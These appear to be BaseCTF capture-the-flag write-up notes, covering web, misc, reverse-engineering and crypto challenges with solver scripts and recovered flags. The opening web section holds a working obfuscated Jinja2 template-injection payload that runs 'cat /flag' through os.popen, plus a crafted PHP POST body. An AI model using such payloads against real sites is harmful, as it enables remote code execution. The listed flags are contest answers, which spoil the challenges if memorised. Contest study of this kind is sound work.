Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close

flag=BaseCTF%7b%25set%20a%3d'o''s'%25%7d%7b%25set%20b%3d'cat%20%25cflag'%25(47)%25%7d%7b%25print%20()%7cattr('%25c%25ccl''ass%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cba''se%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25csubcl''asses%25c%25c'%25(95%2c95%2c95%2c95))()%7cattr('%25c%25cgetitem%25c%25c'%25(95%2c95%2c95%2c95))(240)%7cattr('%25c%25cin''it%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cglo''bals%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cgetitem%25c%25c'%25(95%2c95%2c95%2c95))('%25c%25cbuil''tins%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cgetitem%25c%25c'%25(95%2c95%2c95%2c95))('%25c%25cimp''ort%25c%25c'%25(95%2c95%2c95%2c95))(a)%7cattr('po''pen')(b)%7cattr('read')()%25%7d

Done|[Week3] 玩原神玩的

php代码审计

POST /?tip=%E6%88%91%E8%A6%81%E7%8E%A9%E5%8E%9F%E7%A5%9E HTTP/1.1
Host: challenge.basectf.fun:36252
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 417

len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&m[]=100%25&m[]=love100%2530bd7ce7de206924302499f197c7a966
from hashlib import md5

# Recover the input one character at a time: entry i of md5key is compared
# with the MD5 of the decimal string of (ord(char) XOR i), which mirrors the
# PHP expression quoted below. The first printable match is printed and
# positions without a match print nothing.
for offset, wanted in enumerate(md5key):
    # md5(ord($array[$ii]) ^ $ii);
    match = next(
        (
            symbol
            for symbol in string.printable
            if md5(str(ord(symbol) ^ offset).encode()).hexdigest() == wanted
        ),
        None,
    )
    if match is not None:
        print(match, end='')

Week2

Misc

[Week2] Base_!

用magic提示

from base64, 表 +-0-9A-Za-z

Rotate right 2

mxxencode !!!Give your flag:BaseCTF{BaseCTF_is_So_Good!!}

[Week2] 海上又遇了鲨鱼

文件 - 导出 FTP-DATA

直接搜password -- Ba3eBa3e!@#

BaseCTF{W1r3sharK_3at_r3p3at_paSsw0rd}

[Week2] 黑丝上的flag

stegsolve 翻

BaseCTF{Bl4ck_5ilk_1s_the_be5t}

前辈什么的最喜欢了

png改高

BaseCTF{q1n6_k4n_zh3_w0}

[Week2] Aura 酱的旅行日记 图寻擂台

Google识图

BaseCTF{四川省成都市成华区成华大道十里店路88号}

[Week2] 二维码1-街头小广告

直接扫码

[Week2] 哇!珍德食泥鸭

尾部有docx,flag在[Content_Types].xml中

[Week2] 反方向的雪

文件尾zip逆序,含snow隐写的key

密码爆破6数字123456

SNOW.EXE -p n0secr3t -C flag.txt 1.txt

BaseCTF{Y0u_g0t_1t!}

[Week2] ez_crypto

大小写替换,再解base

BaseCTF{Th1s_1s_4n_ez_b4se64dec0de}

[Week2] Aura 酱的旅行日记 II <图寻擂台>

BaseCTF{四川省成都市吉瑞二路188号成都盛捷高新服务公寓}

辣鸡手动爆破

[Week2] Aura 酱的旅行日记 III <图寻擂台>

瓦屋山风景区

UNDO|[Week2] Aura 酱的旅行日记 IV <图寻擂台>

不对:

BaseCTF{江苏省南京市秦淮区贡院西街夫子庙-秦淮风光带}

UNDO|[Week2] Aura 酱的旅行日记 V <图寻擂台>

不对:

BaseCTF{四川省广安市广安区*故里旅游景区-*铜像广场and*故居陈列馆}

[Week2] Aura 酱的旅行日记 VI <图寻擂台>

BaseCTF{山西省太原市迎泽区青年路49号太原市第五中学校-建校时间1906年}

[Week2] Aura 酱的旅行日记 VII <图寻擂台>

re

upx

UPX 的特征字符串被小改过:用 010 Editor 把 upx 替换回 UPX 再脱壳;IDA 里一眼就能看出是换表 base64。

import base64

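# Decode a string that was base64-encoded with a substituted alphabet by
# mapping every symbol back to the standard alphabet and decoding normally.
STD_BASE64CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# The custom alphabet recovered from the binary. It contains 'A' twice
# (positions 0 and 39). str.maketrans keeps the later mapping, so 'A' decodes
# as value 39, and a symbol with value 0 cannot be told apart from it.
my_base64chars = 'A,.1fgvw#`/2ehux$~"3dity%_;4cjsz^+{5bkrA&=}6alqB*-[70mpC()]89noX'

cipher = "$rg7_dhd~Alidg+zeyhz`vnz_d,7sy0="
# '=' is also a symbol of the custom alphabet (value 41), so translating the
# whole string would turn the trailing padding into data and append a stray
# byte to the result. The trailing '=' run is therefore split off, kept as
# padding and re-attached after the translation.
body = cipher.rstrip('=')
padding = cipher[len(body):]
cipher = body.translate(str.maketrans(my_base64chars, STD_BASE64CHARS)) + padding
data = base64.b64decode(cipher)
print(data)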

[Week2] 喝杯下午茶

标准tea 板子

BaseCTF{h3r3_4_cuP_0f_734_f0R_y0U!!!!!!}

from Crypto.Util.number import long_to_bytes


def encrypt(v, k):
    """Encrypt one 64-bit block with standard 32-round TEA.

    Args:
        v: two 32-bit words (the block).
        k: four 32-bit words (the key).

    Returns:
        A list with the two encrypted 32-bit words.
    """
    mask = 0xFFFFFFFF
    left, right = v
    key_a, key_b, key_c, key_d = k
    running = 0
    for _ in range(32):
        # The round constant accumulates before each pair of half-rounds.
        running = (running + 0x9E3779B9) & mask
        left_mix = ((right << 4) + key_a) ^ (right + running) ^ ((right >> 5) + key_b)
        left = (left + left_mix) & mask
        right_mix = ((left << 4) + key_c) ^ (left + running) ^ ((left >> 5) + key_d)
        right = (right + right_mix) & mask
    return [left, right]


def decrypt(v, k):
    """Decrypt one 64-bit block of the challenge's TEA variant.

    The round constant here is 0x114514, not the standard 0x9E3779B9 used by
    encrypt() in this file, so the two functions are not inverses.

    Args:
        v: two 32-bit words (the ciphertext block).
        k: four 32-bit words (the key).

    Returns:
        A list with the two decrypted 32-bit words.
    """
    mask = 0xFFFFFFFF
    step = 0x114514
    left, right = v
    # Start from the sum reached after 32 encryption rounds and count down.
    running = (step * 32) & mask
    # x = sum(delta for _ in range(32)) & 0xFFFFFFFF
    key_a, key_b, key_c, key_d = k
    for _ in range(32):
        right_mix = ((left << 4) + key_c) ^ (left + running) ^ ((left >> 5) + key_d)
        right = (right - right_mix) & mask
        left_mix = ((right << 4) + key_a) ^ (right + running) ^ ((right >> 5) + key_b)
        left = (left - left_mix) & mask
        running = (running - step) & mask
    return [left, right]


if __name__ == '__main__':
    # Key and ciphertext words as they appear in the challenge binary.
    key = [0x11223344, 0x55667788, 0x99AABBCC, 0xDDEEFF11]
    print(key)
    v6 = [
        0x94B1F1E7, 0x21D5D352,
        0x5247793D, 0x40D1C97,
        0xF36E7F74, 0x9C53F70F,
        0x6AEACFD8, 0x6F9F06F4,
        0xEAFD9E2E, 0x32B655F7,
    ]
    # Decrypt the ten words as five 64-bit blocks. Each decrypted word is
    # converted to bytes and reversed before printing, because the program
    # stores its characters in little-endian order.
    for offset in range(0, 10, 2):
        v = decrypt(v6[offset:offset + 2], key)
        for word in (v[0], v[1]):
            print(long_to_bytes(word).decode()[::-1], end='')

lk

from natsort import natsorted
from z3 import *

# One 8-bit symbolic variable per input byte, named s1_0 .. s1_23; only
# indices 1..20 appear in the constraints listed below.
# (Author's note: sometimes Int variables work better than BitVecs.)
# NOTE(review): with 8-bit BitVecs, z3py coerces the integer coefficients and
# right-hand sides to 8 bits as well, so each equation is only enforced
# modulo 256 -- check the model against the original comparison, or switch to
# Int variables with explicit range constraints.
byte_14000A668 = [BitVec(f's1_{i}', 8) for i in range(24)]

solver = Solver()

solver.add(948 * byte_14000A668[20] + 887 * byte_14000A668[19] + 410 * byte_14000A668[18] + 978 * byte_14000A668[17] + 417 * byte_14000A668[16] + 908 * byte_14000A668[15] + 965 * byte_14000A668[14] + 987 * byte_14000A668[13] + 141 * byte_14000A668[12] + 257 * byte_14000A668[11] + 323 * byte_14000A668[10] + 931 * byte_14000A668[9] + 773 * byte_14000A668[8] + 851 * byte_14000A668[7] + 758 * byte_14000A668[6] + 891 * byte_14000A668[5] + 575 * byte_14000A668[4] + 616 * byte_14000A668[3] + 860 * byte_14000A668[2] + 283 * byte_14000A668[1] == 913686)
solver.add(938 * byte_14000A668[20] + 490 * byte_14000A668[19] + 920 * byte_14000A668[18] + 50 * byte_14000A668[17] + 568 * byte_14000A668[16] + 68 * byte_14000A668[15] + 35 * byte_14000A668[14] + 708 * byte_14000A668[13] + 938 * byte_14000A668[12] + 718 * byte_14000A668[11] + 589 * byte_14000A668[10] + 954 * byte_14000A668[9] + 974 * byte_14000A668[8] + 62 * byte_14000A668[7] + 580 * byte_14000A668[6] + 80 * byte_14000A668[5] + 111 * byte_14000A668[4] + 151 * byte_14000A668[3] + 421 * byte_14000A668[2] + 148 * byte_14000A668[1] == 630335)
solver.add(908 * byte_14000A668[20] + 590 * byte_14000A668[19] + 668 * byte_14000A668[18] + 222 * byte_14000A668[17] + 489 * byte_14000A668[16] + 335 * byte_14000A668[15] + 778 * byte_14000A668[14] + 622 * byte_14000A668[13] + 95 * byte_14000A668[12] + 920 * byte_14000A668[11] + 932 * byte_14000A668[10] + 892 * byte_14000A668[9] + 409 * byte_14000A668[8] + 392 * byte_14000A668[7] + 11 * byte_14000A668[6] + 113 * byte_14000A668[5] + 948 * byte_14000A668[4] + 674 * byte_14000A668[3] + 506 * byte_14000A668[2] + 182 * byte_14000A668[1] == 707525)
solver.add(479 * byte_14000A668[20] + 859 * byte_14000A668[19] + 410 * byte_14000A668[18] + 399 * byte_14000A668[17] + 891 * byte_14000A668[16] + 266 * byte_14000A668[15] + 773 * byte_14000A668[14] + 624 * byte_14000A668[13] + 34 * byte_14000A668[12] + 479 * byte_14000A668[11] + 465 * byte_14000A668[10] + 728 * byte_14000A668[9] + 447 * byte_14000A668[8] + 427 * byte_14000A668[7] + 890 * byte_14000A668[6] + 570 * byte_14000A668[5] + 716 * byte_14000A668[4] + 180 * byte_14000A668[3] + 571 * byte_14000A668[2] + 707 * byte_14000A668[1] == 724203)
solver.add(556 * byte_14000A668[20] + 798 * byte_14000A668[19] + 380 * byte_14000A668[18] + 716 * byte_14000A668[17] + 71 * byte_14000A668[16] + 901 * byte_14000A668[15] + 949 * byte_14000A668[14] + 304 * byte_14000A668[13] + 142 * byte_14000A668[12] + 679 * byte_14000A668[11] + 459 * byte_14000A668[10] + 814 * byte_14000A668[9] + 282 * byte_14000A668[8] + 49 * byte_14000A668[7] + 873 * byte_14000A668[6] + 169 * byte_14000A668[5] + 437 * byte_14000A668[4] + 199 * byte_14000A668[3] + 771 * byte_14000A668[2] + 807 * byte_14000A668[1] == 688899)
solver.add(465 * byte_14000A668[20] + 898 * byte_14000A668[19] + 979 * byte_14000A668[18] + 198 * byte_14000A668[17] + 156 * byte_14000A668[16] + 831 * byte_14000A668[15] + 856 * byte_14000A668[14] + 322 * byte_14000A668[13] + 25 * byte_14000A668[12] + 35 * byte_14000A668[11] + 369 * byte_14000A668[10] + 917 * byte_14000A668[9] + 522 * byte_14000A668[8] + 654 * byte_14000A668[7] + 235 * byte_14000A668[6] + 385 * byte_14000A668[5] + 469 * byte_14000A668[4] + 231 * byte_14000A668[3] + 496 * byte_14000A668[2] + 83 * byte_14000A668[1] == 604784)
solver.add(305 * byte_14000A668[20] + 928 * byte_14000A668[19] + 260 * byte_14000A668[18] + 793 * byte_14000A668[17] + 787 * byte_14000A668[16] + 708 * byte_14000A668[15] + 758 * byte_14000A668[14] + 236 * byte_14000A668[13] + 688 * byte_14000A668[12] + 747 * byte_14000A668[11] + 711 * byte_14000A668[10] + 195 * byte_14000A668[9] + 50 * byte_14000A668[8] + 648 * byte_14000A668[7] + 787 * byte_14000A668[6] + 376 * byte_14000A668[5] + 220 * byte_14000A668[4] + 33 * byte_14000A668[3] + 194 * byte_14000A668[2] + 585 * byte_14000A668[1] == 665485)
solver.add(767 * byte_14000A668[20] + 573 * byte_14000A668[19] + 22 * byte_14000A668[18] + 909 * byte_14000A668[17] + 598 * byte_14000A668[16] + 588 * byte_14000A668[15] + 136 * byte_14000A668[14] + 848 * byte_14000A668[12] + 964 * byte_14000A668[11] + 311 * byte_14000A668[10] + 701 * byte_14000A668[9] + 653 * byte_14000A668[8] + 541 * byte_14000A668[7] + 443 * byte_14000A668[6] + 7 * byte_14000A668[5] + 976 * byte_14000A668[4] + 803 * byte_14000A668[3] + 273 * byte_14000A668[2] + 859 * byte_14000A668[1] == 727664)
solver.add(776 * byte_14000A668[20] + 59 * byte_14000A668[19] + 507 * byte_14000A668[18] + 164 * byte_14000A668[17] + 397 * byte_14000A668[16] + 744 * byte_14000A668[15] + 377 * byte_14000A668[14] + 768 * byte_14000A668[13] + 456 * byte_14000A668[12] + 799 * byte_14000A668[11] + 9 * byte_14000A668[10] + 215 * byte_14000A668[9] + 365 * byte_14000A668[8] + 181 * byte_14000A668[7] + 634 * byte_14000A668[6] + 818 * byte_14000A668[5] + 81 * byte_14000A668[4] + 236 * byte_14000A668[3] + 883 * byte_14000A668[2] + 95 * byte_14000A668[1] == 572015)
solver.add(873 * byte_14000A668[20] + 234 * byte_14000A668[19] + 381 * byte_14000A668[18] + 423 * byte_14000A668[17] + 960 * byte_14000A668[16] + 689 * byte_14000A668[15] + 617 * byte_14000A668[14] + 240 * byte_14000A668[13] + 933 * byte_14000A668[12] + 300 * byte_14000A668[11] + 998 * byte_14000A668[10] + 773 * byte_14000A668[9] + 484 * byte_14000A668[8] + 905 * byte_14000A668[7] + 806 * byte_14000A668[6] + 792 * byte_14000A668[5] + 606 * byte_14000A668[4] + 942 * byte_14000A668[3] + 422 * byte_14000A668[2] + 789 * byte_14000A668[1] == 875498)
solver.add(766 * byte_14000A668[20] + 7 * byte_14000A668[19] + 283 * byte_14000A668[18] + 900 * byte_14000A668[17] + 211 * byte_14000A668[16] + 305 * byte_14000A668[15] + 343 * byte_14000A668[14] + 696 * byte_14000A668[13] + 590 * byte_14000A668[12] + 736 * byte_14000A668[11] + 817 * byte_14000A668[10] + 603 * byte_14000A668[9] + 414 * byte_14000A668[8] + 828 * byte_14000A668[7] + 114 * byte_14000A668[6] + 845 * byte_14000A668[5] + 175 * byte_14000A668[4] + 212 * byte_14000A668[3] + 898 * byte_14000A668[2] + 988 * byte_14000A668[1] == 714759)
solver.add(220 * byte_14000A668[20] + 30 * byte_14000A668[19] + 788 * byte_14000A668[18] + 106 * byte_14000A668[17] + 574 * byte_14000A668[16] + 501 * byte_14000A668[15] + 366 * byte_14000A668[14] + 952 * byte_14000A668[13] + 121 * byte_14000A668[12] + 996 * byte_14000A668[11] + 735 * byte_14000A668[10] + 689 * byte_14000A668[9] + 998 * byte_14000A668[8] + 689 * byte_14000A668[7] + 729 * byte_14000A668[6] + 886 * byte_14000A668[5] + 860 * byte_14000A668[4] + 70 * byte_14000A668[3] + 466 * byte_14000A668[2] + 961 * byte_14000A668[1] == 778853)
solver.add(313 * byte_14000A668[20] + 748 * byte_14000A668[19] + 522 * byte_14000A668[18] + 864 * byte_14000A668[17] + 156 * byte_14000A668[16] + 362 * byte_14000A668[15] + 283 * byte_14000A668[14] + 49 * byte_14000A668[13] + 316 * byte_14000A668[12] + 79 * byte_14000A668[11] + 136 * byte_14000A668[10] + 299 * byte_14000A668[9] + 271 * byte_14000A668[8] + 604 * byte_14000A668[7] + 907 * byte_14000A668[6] + 540 * byte_14000A668[5] + 141 * byte_14000A668[4] + 620 * byte_14000A668[3] + 701 * byte_14000A668[2] + 866 * byte_14000A668[1] == 584591)
solver.add(922 * byte_14000A668[20] + 399 * byte_14000A668[19] + 425 * byte_14000A668[18] + 26 * byte_14000A668[17] + 159 * byte_14000A668[16] + 224 * byte_14000A668[15] + 438 * byte_14000A668[14] + 770 * byte_14000A668[13] + 144 * byte_14000A668[12] + 406 * byte_14000A668[11] + 110 * byte_14000A668[10] + 991 * byte_14000A668[9] + 749 * byte_14000A668[8] + 701 * byte_14000A668[7] + 646 * byte_14000A668[6] + 147 * byte_14000A668[5] + 979 * byte_14000A668[4] + 674 * byte_14000A668[3] + 999 * byte_14000A668[2] + 913 * byte_14000A668[1] == 717586)
solver.add(13 * byte_14000A668[20] + 537 * byte_14000A668[19] + 225 * byte_14000A668[18] + 421 * byte_14000A668[17] + 153 * byte_14000A668[16] + 484 * byte_14000A668[15] + 654 * byte_14000A668[14] + 743 * byte_14000A668[13] + 779 * byte_14000A668[12] + 74 * byte_14000A668[11] + 325 * byte_14000A668[10] + 439 * byte_14000A668[9] + 797 * byte_14000A668[8] + 41 * byte_14000A668[7] + 784 * byte_14000A668[6] + 269 * byte_14000A668[5] + 454 * byte_14000A668[4] + 725 * byte_14000A668[2] + 164 * byte_14000A668[1] == 537823)
solver.add(591 * byte_14000A668[20] + 210 * byte_14000A668[19] + 874 * byte_14000A668[18] + 204 * byte_14000A668[17] + 485 * byte_14000A668[16] + 42 * byte_14000A668[15] + 433 * byte_14000A668[14] + 176 * byte_14000A668[13] + 436 * byte_14000A668[12] + 634 * byte_14000A668[11] + 82 * byte_14000A668[10] + 978 * byte_14000A668[9] + 818 * byte_14000A668[8] + 683 * byte_14000A668[7] + 404 * byte_14000A668[6] + 562 * byte_14000A668[5] + 41 * byte_14000A668[4] + 789 * byte_14000A668[3] + 200 * byte_14000A668[2] + 220 * byte_14000A668[1] == 587367)
solver.add(584 * byte_14000A668[20] + 597 * byte_14000A668[19] + 928 * byte_14000A668[18] + 532 * byte_14000A668[17] + 902 * byte_14000A668[16] + 858 * byte_14000A668[15] + 820 * byte_14000A668[14] + 240 * byte_14000A668[13] + 124 * byte_14000A668[12] + 899 * byte_14000A668[11] + 848 * byte_14000A668[10] + 822 * byte_14000A668[9] + 409 * byte_14000A668[8] + 491 * byte_14000A668[7] + 587 * byte_14000A668[6] + 715 * byte_14000A668[5] + 410 * byte_14000A668[4] + 268 * byte_14000A668[3] + 721 * byte_14000A668[2] + 915 * byte_14000A668[1] == 842245)
solver.add(421 * byte_14000A668[20] + 302 * byte_14000A668[19] + 327 * byte_14000A668[18] + 180 * byte_14000A668[17] + (byte_14000A668[16] << 9) + 160 * byte_14000A668[15] + 623 * byte_14000A668[14] + 28 * byte_14000A668[13] + 411 * byte_14000A668[12] + 53 * byte_14000A668[11] + 633 * byte_14000A668[10] + 560 * byte_14000A668[9] + 623 * byte_14000A668[8] + 477 * byte_14000A668[7] + 901 * byte_14000A668[6] + 287 * byte_14000A668[5] + 149 * byte_14000A668[4] + 726 * byte_14000A668[3] + 934 * byte_14000A668[2] + 875 * byte_14000A668[1] == 610801)
solver.add(838 * byte_14000A668[20] + 434 * byte_14000A668[19] + 792 * byte_14000A668[18] + 649 * byte_14000A668[17] + 462 * byte_14000A668[16] + 170 * byte_14000A668[15] + 980 * byte_14000A668[14] + 15 * byte_14000A668[13] + 295 * byte_14000A668[12] + 495 * byte_14000A668[11] + 666 * byte_14000A668[10] + 934 * byte_14000A668[9] + 17 * byte_14000A668[8] + 69 * byte_14000A668[7] + 367 * byte_14000A668[6] + 780 * byte_14000A668[5] + 291 * byte_14000A668[4] + 834 * byte_14000A668[3] + 587 * byte_14000A668[2] + 133 * byte_14000A668[1] == 653127)
solver.add(41 * byte_14000A668[20] + 422 * byte_14000A668[19] + 420 * byte_14000A668[18] + 224 * byte_14000A668[17] + 475 * byte_14000A668[16] + 854 * byte_14000A668[15] + 233 * byte_14000A668[14] + 179 * byte_14000A668[13] + 620 * byte_14000A668[12] + 69 * byte_14000A668[11] + 42 * byte_14000A668[10] + 684 * byte_14000A668[9] + 300 * byte_14000A668[8] + 745 * byte_14000A668[7] + 894 * byte_14000A668[6] + 554 * byte_14000A668[5] + 495 * byte_14000A668[4] + 66 * byte_14000A668[3] + 316 * byte_14000A668[2] + 391 * byte_14000A668[1] == 533470)

# Prints sat/unsat; model() below raises if the result was not sat.
print(solver.check())
res = solver.model()

# The model's declarations come back unordered; a natural sort on the
# variable name puts s1_2 before s1_10 so the characters print in input order.
lst = natsorted(((decl, res[decl]) for decl in res), key=lambda pair: str(pair[0]))
for _, value in lst:
    print(chr(value.as_long()), end='')

# BaseCTF{CDBBDCAAABBDBCCBCCAC}

Ezpy

python re_pyinstxtractor.py 解压文件.提示3.9版本

用3.9版本解压. pycdc查看Ezpy.pyc得到源码rc4加密.改一改跑一下

# Ad-hoc namespace class holding the two secrets used by this script:
# "key" seeds the RC4 S-box and "keykey" is XORed into the keystream.
Key = type(
    "suibian",
    (),
    {
        "key": 'yOU_f1nd_m3',
        "keykey": [66, 97, 115, 101],
    },
)


def init_Sbox(seed):
    """Run the RC4 key-scheduling step and return the 256-entry S-box.

    seed: non-empty string; its characters are cycled to supply 256 key bytes.
    """
    seed_len = len(seed)
    box = list(range(256))
    swap_at = 0
    for pos in range(256):
        key_byte = ord(seed[pos % seed_len])
        swap_at = (swap_at + box[pos] + key_byte) % 256
        box[pos], box[swap_at] = box[swap_at], box[pos]
    return box


def KeyStream(text, Sbox):
    """Return len(text) keystream bytes: RC4 output XORed with Key.keykey.

    The extra XOR with the repeating ``Key.keykey`` bytes is what makes this
    differ from plain RC4. The caller's S-box is copied, not mutated.
    """
    box = Sbox.copy()
    a = b = 0
    stream = []
    for pos in range(len(text)):
        a = (a + 1) % 256
        b = (b + box[a]) % 256
        box[a], box[b] = box[b], box[a]
        rc4_byte = box[(box[a] + box[b]) % 256]
        stream.append(rc4_byte ^ Key.keykey[pos % len(Key.keykey)])
    return stream


def Encrypt(text, seed):
    """XOR ``text`` (bytes) with the keystream derived from ``seed``.

    XOR with the same keystream is its own inverse, so the same call decrypts.
    """
    stream = KeyStream(text, init_Sbox(seed))
    return bytes(byte ^ pad for byte, pad in zip(text, stream))


# Ciphertext bytes from the decompiled Ezpy.pyc.
enc = b'\xe6\xaeC~F\xf2\xe3\xbb\xac\x9a-\x02U\x85p\xeb\x19\xd1\xe4\xc93sG\xb0\xeb1\xb5\x05\x05\xc3\xd7\x00\x18+D\xbc\x0cO\x9em\xf1\xbd'
# The cipher is a pure XOR stream, so "encrypting" the ciphertext with the
# same key yields the plaintext.
flag = Encrypt(enc, Key.key)
# Self-check: the recovered plaintext is the expected flag.
assert flag == b'BaseCTF{Y0u_kn0W_d3C0Mp1l4710N_PY_4ND_rC4}'

最简单的编码

// Decompiler output: walks the buffer at a1 in 16 groups of 4 bytes and calls
// sub_14001119A on offsets (0, 2) and (1, 3) of each group.
// NOTE(review): sub_14001119A is presumably a two-byte swap (its body is not
// shown); swapping 0<->2 and 1<->3 turns "ABCD" into "CDAB", which matches the
// derived table quoted right after this listing.
__int64 __fastcall sub_140011CC0(__int64 a1)
{
  __int64 result; // rax
  int i; // [rsp+24h] [rbp+4h]

  result = sub_140011389(&unk_140023015);
  for ( i = 0; i < 16; ++i )              // 16 groups x 4 bytes = 64 table entries
  {
    sub_14001119A(4 * i + a1, 4 * i + 2 + a1);      // first and third byte of the group
    sub_14001119A(4 * i + 1 + a1, 4 * i + 3 + a1);  // second and fourth byte of the group
    result = (unsigned int)(i + 1);
  }
  return result;
}
换表后为 CDABGHEFKLIJOPMNSTQRWXUVabYZefcdijghmnklqropuvstyzwx23016745+/89

// Excerpt of the decompiled encoder (the start of the body is elided with "...").
// It differs from plain base64 in one way visible here: each 6-bit index has
// arr[0..3] added to it (by output position within the 4-symbol group) before
// being masked to 6 bits and looked up in TABLE.
_BYTE *__fastcall Base64Enc(char *Input, char *TABLE, unsigned int slen, _DWORD *arr)
{
    ...
    InputTmp = (s1 << 16) + s3 + (v12 << 8);           // three input bytes packed into 24 bits
    buf[j] = TABLE[(*arr + (InputTmp >> 18)) & 0x3F];// ch0 = T[top 6 bits + arr[0]]
    p2 = j + 1;
    buf[p2] = TABLE[(arr[1] + (InputTmp >> 12)) & 0x3F];// T[bits 6-12 + arr[1]]
    buf[++p2] = TABLE[(arr[2] + (InputTmp >> 6)) & 0x3F];// T[bits 12-18 + arr[2]]
    buf[++p2] = TABLE[(arr[3] + InputTmp) & 0x3F];// T[bits 18-24 + arr[3]]
    j = p2 + 1;
  }
  // Overwrite the last (3 - slen % 3) % 3 output symbols with '=' (61) as padding.
  for ( i = 0i64; i < (3 - slen % 3) % 3; ++i )
    buf[v6 - 1 - i] = 61;
  buf[v6] = 0;                                         // NUL terminator
  return buf;
}

// 在替换新表的时候 加上了 arr数组[1,2,3,4]进行偏移, 索引回去换表解.
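import base64

# Encoded string to reverse.
en_cipher = "TqK1YUSaQryEMHaLMnWhYU+Fe0WPenqhRXahfkV6WE2fa3iRW197Za62eEaD"

STD_BASE64CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Table after the in-place pair swaps done by the binary.
my_base64chars = "CDABGHEFKLIJOPMNSTQRWXUVabYZefcdijghmnklqropuvstyzwx23016745+/89"

# The encoder adds arr[i % 4] to every 6-bit index before the table lookup,
# so decoding subtracts the same offset.
k = [1, 2, 3, 4]
lst = []
for i, c in enumerate(en_cipher):
    # Parenthesised so the modulo applies to the difference. The original
    # `index - k % len` bound the modulo to k alone and only produced the right
    # symbol because Python's negative indexing happened to wrap the same way.
    idx = (my_base64chars.index(c) - k[i % 4]) % len(my_base64chars)
    # idx is now the plain 6-bit value; emit the standard symbol for it.
    lst.append(STD_BASE64CHARS[idx])

cipher = ''.join(lst)
data = base64.b64decode(cipher)
print(data)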
# BaseCTF{B45E64_eNCoDIn9_I5_rE4LLY_7OO_5implE}

[Week2] RivestCipher

BaseCTF

0ebb0c573dd548f3d2b2525f02895cd5275b6f6e5776538982ea41246dae8517

BaseCTF{go1@ng_!S_RuNNin9_RC4}


Crypto

[Week2] basic

import base64
import libnum
from Crypto.Util.number import *

from pwn import *
context.log_level = "debug"

r = remote("challenge.basectf.fun", 27457)

# 100 rounds; each round reads a one-letter tag line and a payload line, and
# answers with the payload decoded according to the tag.
for _ in range(100):
    choice = r.recvuntil(b"\n").replace(b"\n", b"")
    secret = r.recvuntil(b"\n").replace(b"\n", b"")

    if choice == b"A":
        # base64 text
        answer = base64.b64decode(secret)
    elif choice == b"B":
        # hexadecimal integer -> bytes
        answer = libnum.n2s(int(secret, 16))
    elif choice == b"C":
        # decimal integer -> bytes
        answer = libnum.n2s(int(secret))
    elif choice == b"D":
        # "[n, n, ...]" list of character codes
        codes = secret.replace(b"[", b"").replace(b"]", b"").split(b",")
        answer = ''.join(chr(int(code)) for code in codes).encode()
    else:
        # Unknown tag: send nothing, as before.
        continue
    r.sendline(answer)

r.interactive()

[Week2] two_squares

平方和求解

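# RSA public exponent and ciphertext from the challenge.
e = 65537
c = 42330675787206041757903427737108553993012805007294570657461042152628982126538
# x is treated as p^2 + q^2; Sage's two_squares() returns one pair (a, b)
# with a^2 + b^2 == x.
# NOTE(review): a number can have more than one such representation, so it is
# worth confirming that the returned pair really are the primes.
x = 209479773119142584969854470862023704936857416491817498021871883305658177375498

# Computed once from x (the earlier stand-alone call with the same literal
# only echoed the result in an interactive session).
p, q = two_squares(x)
n = p * q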

# init p q e c
from Crypto.Util.number import long_to_bytes, bytes_to_long


def decrypt_rsa():
    """Print the RSA plaintext recovered from the module-level p, q, e, c, n."""
    import gmpy2
    totient = (p - 1) * (q - 1)
    private_exp = gmpy2.invert(e, totient)
    print(long_to_bytes(pow(c, private_exp, n)))


decrypt_rsa()

然后求RSA BaseCTF{0760becd-cefaab0b094d}

[Week2] 铜匠

BaseCTF{7074ddc3e006810688241196414e49e2}

高低位

from Crypto.Util.number import *
from gmpy2 import *
e = 65537
c = 15659576879410368237140555530527974801613150473447768911067611094143466009251385693099110691602954207905029692682380253595062935017486879899242785756448973466690818942065250284891341066578689696180061755610538867770441139827574063212967027249650509215685566103350688284041405586915563454117672061141919712416360596137520514412607512596079964611672166435592936417138352662031529414118312166411150736015788925026636845744110093161894267707446937939130745326244186579516665160036229715964182962542836836457885170975474737620430886449029488829662146456489724775166105816909257516908496172172266375617868819982791477888289
# sage
p1 = 14439249591349619691972392177790365247490839237199085979433418493254022567815148979672690178
q0 = 90063199151369157959005663017593053931871580139169245885113098598755909124764417
n = 18347545778876678838092757800261556931131930866012101566000425608407193858675622059415995283684230959320874387944052648148677918542763633503231962873204645415818139345588988936580526094727943067102768943117592654029397879665312089518191052154267343886226820785206334238961064175118262578895847281575656290248049404047727756356910896332939145136942219317065063060070725033146788186604738271846183709127655298440696824683099637827282095133642324657860714680107691622056420045091586609974536644773286992447027164350612852922016376888380895187804771279035652496676089183636450028327097084911908336202253562671798012457461
# q0 is used as q modulo 2^266 (presumably the leaked low bits of q), so the
# low 266 bits of p follow from p * q = n (mod 2^266).
low_mod = 2 ^ 266
p0 = n * invert(q0, low_mod) % low_mod
